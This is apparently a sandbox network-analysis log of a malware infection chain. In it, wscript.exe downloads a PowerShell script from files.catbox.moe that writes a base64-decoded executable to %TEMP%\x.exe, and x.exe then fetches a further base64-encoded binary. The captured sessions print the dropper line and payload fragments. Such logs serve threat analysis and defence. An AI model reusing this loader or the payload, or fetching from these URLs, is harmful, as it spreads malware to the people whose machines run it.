Dec 19, 2024 07:50:11.122299910 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.122386932 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.122386932 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.122395039 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.122447968 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.231445074 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.231465101 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.231522083 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.231532097 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.231571913 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.231571913 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.243977070 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.243993998 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.244076967 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.244083881 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.244129896 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.256645918 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.256663084 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.256773949 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.256783009 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.256860018 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.267621994 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.267637014 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.267728090 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.267736912 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.267863989 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.279330015 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.279344082 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.279421091 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.279428005 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.279489994 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.292073965 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.292088985 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.292156935 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.292165041 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.292227983 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.304502964 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.304517031 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.304563999 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.304572105 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.304585934 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.304620028 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.413553953 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.413577080 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.413674116 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.413686037 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.413738966 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.422730923 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.422744989 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.422802925 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.422811031 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.422832966 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.422854900 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.432198048 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.432214975 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.432269096 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.432276011 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.432302952 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.432457924 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.440099955 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.440120935 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.440175056 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.440182924 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.440210104 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.440325022 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.443875074 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.443942070 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.443977118 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.444004059 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.453131914 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.464257002 CET	49732	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.464304924 CET	443	49732	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.464400053 CET	49732	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.465050936 CET	49732	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.465070009 CET	443	49732	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:13.193588972 CET	443	49732	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:13.198144913 CET	49732	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:13.198169947 CET	443	49732	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:13.921899080 CET	443	49732	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:13.921964884 CET	443	49732	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:13.922008038 CET	443	49732	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:13.922028065 CET	49732	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:13.922060013 CET	443	49732	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:13.922075987 CET	49732	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:13.922107935 CET	49732	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:14.104665041 CET	443	49732	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:14.104717016 CET	443	49732	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:14.104785919 CET	49732	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:14.104806900 CET	443	49732	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:14.104830980 CET	443	49732	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:14.104839087 CET	49732	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:14.104861021 CET	49732	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:14.104867935 CET	443	49732	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:14.104897022 CET	49732	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:14.104914904 CET	49732	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:14.104919910 CET	443	49732	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:14.104981899 CET	443	49732	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:14.105159998 CET	49732	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:14.105300903 CET	49732	443	192.168.2.4	108.181.20.35

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 19, 2024 07:50:02.893208981 CET	57527	53	192.168.2.4	1.1.1.1
Dec 19, 2024 07:50:03.196091890 CET	53	57527	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 19, 2024 07:50:02.893208981 CET	192.168.2.4	1.1.1.1	0x5e9	Standard query (0)	files.catbox.moe	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 19, 2024 07:50:03.196091890 CET	1.1.1.1	192.168.2.4	0x5e9	No error (0)	files.catbox.moe		108.181.20.35	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

files.catbox.moe

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	108.181.20.35	443	6632	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 06:50:05 UTC	330	OUT	GET /ugok5m.ps1 HTTP/1.1 Accept: / Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: files.catbox.moe Connection: Keep-Alive
2024-12-19 06:50:05 UTC	549	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 19 Dec 2024 06:50:05 GMT Content-Type: application/octet-stream Content-Length: 14456 Last-Modified: Wed, 18 Dec 2024 23:13:24 GMT Connection: close ETag: "67635714-3878" X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' https://files.catbox.moe; style-src https://files.catbox.moe 'unsafe-inline'; img-src 'self' data:; font-src 'self'; media-src 'self'; object-src 'self'; Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD Accept-Ranges: bytes
2024-12-19 06:50:05 UTC	14456	IN	Data Raw: 24 70 3d 5b 49 4f 2e 50 61 74 68 5d 3a 3a 43 6f 6d 62 69 6e 65 28 24 65 6e 76 3a 54 45 4d 50 2c 22 78 2e 65 78 65 22 29 0d 0a 5b 49 4f 2e 46 69 6c 65 5d 3a 3a 57 72 69 74 65 41 6c 6c 42 79 74 65 73 28 24 70 2c 5b 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 Data Ascii: $p=[IO.Path]::Combine($env:TEMP,"x.exe")[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	108.181.20.35	443	3448	C:\Users\user\AppData\Local\Temp\x.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 06:50:10 UTC	76	OUT	GET /0hc11b.txt HTTP/1.1 Host: files.catbox.moe Connection: Keep-Alive
2024-12-19 06:50:10 UTC	560	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 19 Dec 2024 06:50:10 GMT Content-Type: text/plain Content-Length: 382296 Last-Modified: Wed, 18 Dec 2024 23:11:36 GMT Connection: close Vary: Accept-Encoding ETag: "676356a8-5d558" X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' https://files.catbox.moe; style-src https://files.catbox.moe 'unsafe-inline'; img-src 'self' data:; font-src 'self'; media-src 'self'; object-src 'self'; Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD Accept-Ranges: bytes
2024-12-19 06:50:10 UTC	15824	IN	Data Raw: 54 56 70 46 55 75 67 41 41 41 41 41 57 49 50 6f 43 59 76 49 67 38 41 38 69 77 41 44 77 59 50 41 4b 41 4d 49 2f 2b 47 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 75 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 35 41 51 6d 67 50 57 42 6e 38 7a 31 67 5a 2f 4d 39 59 47 66 7a 47 71 61 6f 38 7a 70 67 5a 2f 4d 61 70 71 72 7a 50 47 42 6e 38 78 71 6d 71 2f 4d 38 59 47 66 7a 55 6d 6c 6a 61 44 31 67 5a 2f 4d 41 41 41 41 41 41 41 41 41 41 46 42 46 41 41 42 4d 41 51 45 Data Ascii: TVpFUugAAAAAWIPoCYvIg8A8iwADwYPAKAMI/+GQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAuAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAB5AQmgPWBn8z1gZ/M9YGfzGqao8zpgZ/MapqrzPGBn8xqmq/M8YGfzUmljaD1gZ/MAAAAAAAAAAFBFAABMAQE
2024-12-19 06:50:10 UTC	16384	IN	Data Raw: 67 66 46 41 36 77 45 41 49 38 72 42 34 51 30 7a 38 59 6c 77 49 44 50 33 4d 2f 4d 7a 64 66 78 66 30 65 35 62 69 38 5a 65 69 2b 56 64 77 38 7a 4d 56 59 76 73 69 30 55 49 55 31 61 4e 73 4b 77 43 41 41 42 58 56 73 65 41 30 41 49 41 41 41 41 41 41 41 44 48 67 4e 67 43 41 41 43 2b 46 4c 62 38 78 77 61 34 46 4c 62 38 78 34 44 41 41 67 41 41 73 42 53 32 2f 4d 65 41 37 41 49 41 41 4d 41 55 74 76 7a 6f 76 66 37 2f 2f 34 50 45 42 49 72 49 44 37 62 42 4f 30 55 4d 63 67 6b 37 52 52 41 50 68 68 4d 42 41 41 43 46 39 6e 55 45 4d 38 6e 72 35 34 42 2b 44 41 42 31 57 59 74 4f 4a 4d 64 46 43 4d 43 75 34 67 4f 41 64 51 6d 75 67 48 55 4b 48 49 42 31 43 33 7a 47 52 51 67 41 69 30 55 49 78 6b 59 4d 41 59 74 51 47 49 58 4a 64 41 2b 4c 65 42 53 4c 51 42 77 37 30 48 58 38 44 36 2f Data Ascii: gfFA6wEAI8rB4Q0z8YlwIDP3M/Mzdfxf0e5bi8Zei+Vdw8zMVYvsi0UIU1aNsKwCAABXVseA0AIAAAAAAADHgNgCAAC+FLb8xwa4FLb8x4DAAgAAsBS2/MeA7AIAAMAUtvzovf7//4PEBIrID7bBO0UMcgk7RRAPhhMBAACF9nUEM8nr54B+DAB1WYtOJMdFCMCu4gOAdQmugHUKHIB1C3zGRQgAi0UIxkYMAYtQGIXJdA+LeBSLQBw70HX8D6/
2024-12-19 06:50:10 UTC	16384	IN	Data Raw: 77 36 55 4a 46 48 67 43 38 45 49 5a 54 62 58 38 73 74 65 57 42 73 48 47 42 43 4e 4c 49 37 66 72 67 4a 75 55 73 78 5a 4f 2b 4c 4d 59 6a 54 61 65 43 38 50 37 75 42 53 56 32 6d 6a 5a 65 6b 32 5a 37 4f 6f 71 4d 58 30 65 78 42 36 76 37 35 50 35 4e 67 32 62 4c 44 2b 58 6d 53 44 2f 70 35 53 6f 30 7a 70 63 4a 6f 7a 6f 45 49 36 51 71 30 43 78 2b 2f 45 43 76 6e 34 65 45 76 34 6d 66 4b 6b 58 36 43 75 6a 50 65 4f 48 4b 45 52 2f 76 50 31 70 4c 4f 58 4a 34 38 71 31 2f 49 7a 71 52 51 74 36 46 63 2f 78 59 6c 34 6c 4a 7a 52 47 47 32 74 49 33 4d 31 4d 75 35 47 71 53 69 31 31 4c 6b 7a 42 35 68 58 54 76 53 66 41 53 57 33 6d 61 4f 31 45 47 6a 68 50 64 4f 64 68 51 77 75 55 45 75 71 42 6b 37 2f 6c 4c 4e 67 38 55 6b 4a 51 34 45 77 7a 33 38 39 4c 71 5a 6d 30 54 70 61 5a 51 47 72 Data Ascii: w6UJFHgC8EIZTbX8steWBsHGBCNLI7frgJuUsxZO+LMYjTaeC8P7uBSV2mjZek2Z7OoqMX0exB6v75P5Ng2bLD+XmSD/p5So0zpcJozoEI6Qq0Cx+/ECvn4eEv4mfKkX6CujPeOHKER/vP1pLOXJ48q1/IzqRQt6Fc/xYl4lJzRGG2tI3M1Mu5GqSi11LkzB5hXTvSfASW3maO1EGjhPdOdhQwuUEuqBk7/lLNg8UkJQ4Ewz389LqZm0TpaZQGr
2024-12-19 06:50:10 UTC	16384	IN	Data Raw: 4b 4e 6f 53 31 68 51 37 42 79 65 79 56 6c 57 2b 77 6b 53 66 6a 50 67 45 72 66 44 35 51 45 79 59 35 47 36 66 67 77 2f 63 6f 4a 2f 47 37 42 49 72 6e 37 79 6d 41 72 32 44 62 2f 42 69 36 36 75 30 37 71 48 6c 42 4e 72 43 41 48 35 7a 41 5a 6a 68 56 4c 4f 70 59 4f 71 76 46 64 4a 77 76 5a 44 31 4e 4d 6c 5a 36 57 6c 6c 38 45 46 67 51 31 68 6a 6b 46 74 32 41 51 53 30 56 76 67 52 41 49 32 7a 44 6f 66 2f 6a 6f 4c 45 68 30 57 66 53 58 6f 33 71 42 47 64 64 51 44 6d 37 73 34 48 51 56 2b 47 57 46 36 34 32 43 71 50 58 62 6d 6c 30 57 34 4d 69 48 4d 32 5a 62 6b 59 6e 72 6b 58 44 59 52 73 6d 54 37 63 63 7a 41 7a 71 66 43 39 6a 69 36 64 61 4f 72 4f 2f 46 41 61 73 59 78 4f 43 53 55 7a 72 6b 65 65 76 75 43 39 44 4a 4a 4d 47 65 63 5a 44 55 61 50 7a 62 6b 67 36 4e 6a 71 30 36 61 Data Ascii: KNoS1hQ7ByeyVlW+wkSfjPgErfD5QEyY5G6fgw/coJ/G7BIrn7ymAr2Db/Bi66u07qHlBNrCAH5zAZjhVLOpYOqvFdJwvZD1NMlZ6Wll8EFgQ1hjkFt2AQS0VvgRAI2zDof/joLEh0WfSXo3qBGddQDm7s4HQV+GWF642CqPXbml0W4MiHM2ZbkYnrkXDYRsmT7cczAzqfC9ji6daOrO/FAasYxOCSUzrkeevuC9DJJMGecZDUaPzbkg6Njq06a
2024-12-19 06:50:10 UTC	16384	IN	Data Raw: 72 43 64 50 30 79 43 71 6b 43 54 54 74 4b 30 65 57 31 34 4a 56 68 7a 4a 41 30 53 39 61 72 45 63 4c 45 65 74 36 51 43 4b 34 6e 6e 6b 4e 76 48 77 50 63 55 30 55 47 31 56 7a 6b 34 75 59 30 75 65 2b 58 55 70 31 35 2f 67 46 78 6e 51 72 4f 58 37 4a 4f 6b 5a 56 56 61 6a 66 31 39 7a 6e 52 54 39 31 78 41 55 6f 45 57 54 48 73 4c 74 33 6a 31 7a 6d 56 57 55 75 32 78 41 58 2f 66 48 41 42 55 64 4b 72 70 37 59 64 58 6d 35 56 78 53 33 69 31 6a 35 50 79 56 43 5a 67 52 74 4d 34 42 5a 57 65 2b 67 58 79 53 4b 4d 35 73 4f 31 66 70 72 75 39 77 62 41 7a 33 64 49 67 4c 75 56 48 75 4f 61 44 76 6f 37 53 5a 75 6b 39 71 4e 54 61 7a 37 4b 59 33 37 61 51 67 78 38 2f 79 52 44 36 61 69 6c 4c 56 49 75 68 51 5a 52 6f 2f 47 31 35 39 73 32 5a 50 37 6e 6f 2f 66 47 79 67 30 66 5a 5a 67 56 43 Data Ascii: rCdP0yCqkCTTtK0eW14JVhzJA0S9arEcLEet6QCK4nnkNvHwPcU0UG1Vzk4uY0ue+XUp15/gFxnQrOX7JOkZVVajf19znRT91xAUoEWTHsLt3j1zmVWUu2xAX/fHABUdKrp7YdXm5VxS3i1j5PyVCZgRtM4BZWe+gXySKM5sO1fpru9wbAz3dIgLuVHuOaDvo7SZuk9qNTaz7KY37aQgx8/yRD6ailLVIuhQZRo/G159s2ZP7no/fGyg0fZZgVC
2024-12-19 06:50:10 UTC	16384	IN	Data Raw: 74 46 77 41 45 50 75 6e 66 56 58 61 4c 7a 6d 2f 51 75 53 61 48 6b 74 76 54 39 67 62 52 46 66 51 54 63 6c 36 73 2b 30 4a 32 55 76 66 44 6f 46 35 5a 76 2b 46 6d 79 71 43 37 6c 61 7a 79 4e 33 41 6d 74 62 54 75 55 53 52 6a 5a 46 56 62 37 52 45 45 44 69 65 66 64 36 55 46 47 5a 6b 55 53 62 2f 51 69 53 5a 6c 43 42 55 6d 30 70 43 63 38 6b 34 54 35 75 4e 78 63 6b 6e 36 62 72 66 4c 50 39 41 74 2b 51 5a 70 67 52 4a 62 62 79 71 4c 66 71 6e 69 30 34 4a 52 6b 76 48 59 55 72 45 6b 42 37 63 72 6e 55 7a 78 45 2b 66 70 7a 57 73 64 65 54 45 38 68 79 45 53 30 66 65 68 6f 51 66 75 78 48 79 52 62 4c 54 59 75 33 6b 46 73 4c 2f 38 32 52 63 49 76 43 77 42 73 36 54 79 35 63 48 51 4a 32 36 74 34 43 77 6b 72 35 48 38 77 79 4a 64 6b 6d 53 56 31 51 66 59 34 75 49 4c 6d 4a 6f 35 38 6e Data Ascii: tFwAEPunfVXaLzm/QuSaHktvT9gbRFfQTcl6s+0J2UvfDoF5Zv+FmyqC7lazyN3AmtbTuUSRjZFVb7REEDiefd6UFGZkUSb/QiSZlCBUm0pCc8k4T5uNxckn6brfLP9At+QZpgRJbbyqLfqni04JRkvHYUrEkB7crnUzxE+fpzWsdeTE8hyES0fehoQfuxHyRbLTYu3kFsL/82RcIvCwBs6Ty5cHQJ26t4Cwkr5H8wyJdkmSV1QfY4uILmJo58n
2024-12-19 06:50:11 UTC	16384	IN	Data Raw: 32 4f 49 4d 75 33 39 64 6f 54 45 76 6d 6b 77 64 31 43 49 51 72 66 74 30 42 77 39 46 57 2b 62 71 55 58 4f 48 77 67 6a 62 6d 73 2b 56 4b 6f 36 70 48 70 48 74 77 4b 59 44 54 6c 59 70 42 43 51 75 34 68 6d 61 49 37 75 57 38 62 4b 79 33 6d 4b 6d 79 58 72 6e 75 77 56 38 4d 66 6a 38 77 74 49 44 6b 62 57 4d 43 41 55 4d 37 55 78 6e 61 37 59 31 41 6a 37 78 32 42 74 33 48 74 42 42 58 5a 32 6f 6e 54 4e 55 53 64 39 35 6a 74 4c 4e 62 58 4f 79 30 75 42 7a 62 48 55 2f 44 56 47 34 51 51 70 39 2b 65 31 30 7a 4f 4c 69 68 56 78 61 4b 65 35 64 54 39 46 69 31 69 6e 74 77 65 32 56 61 45 57 32 32 4c 46 68 51 79 35 4d 66 73 57 68 4b 68 6c 38 45 46 66 36 72 38 68 70 53 4a 79 6b 4a 77 78 4d 48 65 4f 32 59 4e 64 37 34 4e 54 54 32 7a 2b 7a 58 6b 72 4c 6a 69 4c 33 4d 30 63 70 41 41 57 Data Ascii: 2OIMu39doTEvmkwd1CIQrft0Bw9FW+bqUXOHwgjbms+VKo6pHpHtwKYDTlYpBCQu4hmaI7uW8bKy3mKmyXrnuwV8Mfj8wtIDkbWMCAUM7Uxna7Y1Aj7x2Bt3HtBBXZ2onTNUSd95jtLNbXOy0uBzbHU/DVG4QQp9+e10zOLihVxaKe5dT9Fi1intwe2VaEW22LFhQy5MfsWhKhl8EFf6r8hpSJykJwxMHeO2YNd74NTT2z+zXkrLjiL3M0cpAAW
2024-12-19 06:50:11 UTC	16384	IN	Data Raw: 72 6a 42 75 36 61 52 35 30 44 72 6c 2b 51 66 74 62 74 69 4b 58 6d 54 53 46 37 58 37 6c 6a 4d 78 34 32 59 38 37 66 55 4a 33 36 33 43 31 6f 73 77 46 2b 68 6b 77 68 56 34 4c 74 70 2b 43 48 49 4e 4c 48 49 6b 6b 68 36 54 63 43 76 47 70 43 36 35 77 2b 4f 64 56 4e 5a 53 76 44 71 77 69 4b 2b 30 56 56 4f 59 6a 70 32 69 55 5a 77 59 6c 62 32 6a 73 54 59 67 61 6b 54 50 70 61 34 49 4c 59 46 67 43 2f 36 47 76 48 42 6f 49 32 56 4d 73 6d 79 6c 4c 30 76 69 61 5a 64 32 57 62 7a 74 48 54 78 73 58 51 52 57 2f 37 43 64 33 55 61 31 71 64 67 62 65 42 67 4d 62 51 58 74 72 55 57 38 64 66 63 32 6c 70 44 54 6c 63 67 2b 37 79 77 2b 45 58 4e 48 39 6e 78 78 5a 71 42 4c 4a 47 34 79 7a 57 35 67 33 78 77 64 50 49 6e 4a 33 73 42 43 6d 51 75 41 59 68 6e 72 72 4b 5a 52 73 34 37 50 30 72 6f Data Ascii: rjBu6aR50Drl+QftbtiKXmTSF7X7ljMx42Y87fUJ363C1oswF+hkwhV4Ltp+CHINLHIkkh6TcCvGpC65w+OdVNZSvDqwiK+0VVOYjp2iUZwYlb2jsTYgakTPpa4ILYFgC/6GvHBoI2VMsmylL0viaZd2WbztHTxsXQRW/7Cd3Ua1qdgbeBgMbQXtrUW8dfc2lpDTlcg+7yw+EXNH9nxxZqBLJG4yzW5g3xwdPInJ3sBCmQuAYhnrrKZRs47P0ro
2024-12-19 06:50:11 UTC	16384	IN	Data Raw: 64 7a 74 48 5a 39 70 78 68 47 39 59 55 4b 58 41 46 37 51 4e 55 68 65 76 42 37 32 39 43 61 36 41 74 4a 6a 69 4c 4f 75 50 33 6a 4d 4c 55 6f 6a 61 65 4d 68 33 56 73 54 6b 51 68 61 4d 6b 6b 36 64 48 41 56 69 77 32 55 4d 68 45 75 49 4d 67 61 4c 43 6c 6c 64 5a 68 2b 51 70 78 57 75 45 4d 35 30 70 4f 47 63 39 66 6c 74 4f 75 68 51 4d 78 4f 7a 36 4c 47 46 36 39 35 32 43 39 45 4a 4c 66 58 65 61 6a 64 76 6e 61 6a 32 50 4b 56 38 58 58 74 4d 74 66 50 37 52 6d 37 4e 76 4a 4b 4c 57 37 4e 61 36 50 52 56 62 4d 70 32 68 35 4e 66 45 50 4a 73 4e 70 2b 49 4a 58 45 66 58 36 42 57 78 50 38 62 38 74 45 2f 78 53 78 31 57 36 4a 66 33 69 79 57 62 54 61 53 44 74 49 44 34 4e 62 66 41 37 75 35 35 6e 78 55 52 75 68 4b 6d 4e 42 57 31 37 4d 72 4d 53 36 64 52 72 54 55 4a 2f 67 4c 6f 63 57 Data Ascii: dztHZ9pxhG9YUKXAF7QNUhevB729Ca6AtJjiLOuP3jMLUojaeMh3VsTkQhaMkk6dHAViw2UMhEuIMgaLClldZh+QpxWuEM50pOGc9fltOuhQMxOz6LGF6952C9EJLfXeajdvnaj2PKV8XXtMtfP7Rm7NvJKLW7Na6PRVbMp2h5NfEPJsNp+IJXEfX6BWxP8b8tE/xSx1W6Jf3iyWbTaSDtID4NbfA7u55nxURuhKmNBW17MrMS6dRrTUJ/gLocW
2024-12-19 06:50:11 UTC	16384	IN	Data Raw: 50 42 63 65 64 4c 58 51 65 7a 4b 58 5a 56 31 65 69 31 74 6d 74 2f 65 36 34 59 30 33 45 72 50 6b 58 2b 56 42 38 6f 70 77 66 47 6c 2f 32 39 51 6b 74 68 5a 4e 51 73 47 55 4f 4e 6f 30 78 51 7a 54 52 38 6d 45 32 32 31 75 2f 65 6f 2f 36 2b 76 72 36 47 4d 57 66 53 2b 4c 2b 6b 51 56 55 44 51 37 53 64 74 76 55 71 39 31 35 4f 4e 38 58 34 49 65 61 36 42 57 4e 55 71 30 78 6d 2b 34 70 56 73 52 34 33 37 50 74 47 48 49 41 67 30 44 30 6f 44 35 6d 42 6c 62 69 64 2f 2b 59 62 41 30 63 72 78 5a 63 73 66 37 76 4b 6e 4a 48 63 33 6d 2b 63 6c 77 62 2f 35 77 47 37 7a 65 7a 65 4c 6a 68 6b 6f 66 46 42 57 4e 52 65 42 6e 32 63 34 64 41 50 4f 39 44 49 6c 48 6f 67 48 55 4b 4f 4d 62 37 6e 32 66 4f 4d 33 76 35 54 33 46 4e 42 54 74 48 59 6b 6d 36 6e 69 31 55 64 42 4e 7a 68 39 68 79 43 73 Data Ascii: 